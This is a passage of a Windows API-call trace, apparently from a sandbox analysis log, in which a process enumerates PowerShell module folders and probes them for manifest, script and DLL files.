nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0178.286] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.287] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0178.288] ReadFile (in: hFile=0x564, lpBuffer=0x223c630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x223c630*, lpNumberOfBytesRead=0x1b7de428*=0x2e1, lpOverlapped=0x0) returned 1 [0178.290] ReadFile (in: hFile=0x564, lpBuffer=0x223c630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x223c630*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.290] CloseHandle (hObject=0x564) returned 1 [0178.291] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0178.291] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0178.291] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0178.291] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0178.292] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0178.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0178.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6d0) returned 1 [0178.292] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7de7b0 | out: lpFileInformation=0x1b7de7b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0178.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de690) returned 1 [0178.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de700) returned 1 [0178.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0178.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7de190, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b [0178.292] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x1b7de3a0 | out: lpFindFileData=0x1b7de3a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0178.293] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de3f0 | out: lpFindFileData=0x1b7de3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.293] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de650) returned 1 [0178.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de610) returned 1 [0178.294] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0178.294] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0178.294] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0178.294] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0178.294] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0178.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6a0) returned 1 [0178.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0178.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7de130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0178.294] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*", lpFindFileData=0x1b7de340 | out: lpFindFileData=0x1b7de340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.295] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.295] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0178.295] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0178.295] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0178.295] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0178.296] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0178.296] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0178.296] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0178.296] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0178.297] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0178.297] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0178.298] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0178.298] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0178.298] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0178.301] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0178.301] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0178.302] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de390 | out: lpFindFileData=0x1b7de390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0178.309] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5f0) returned 1 [0178.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0178.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de6a0) returned 1 [0178.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7de190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0178.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7de130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0178.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de5b0) returned 1 [0178.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0178.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0178.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0178.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0178.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0178.359] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0178.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0178.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0178.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0178.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0178.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0178.361] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0178.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0178.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0178.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0178.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: 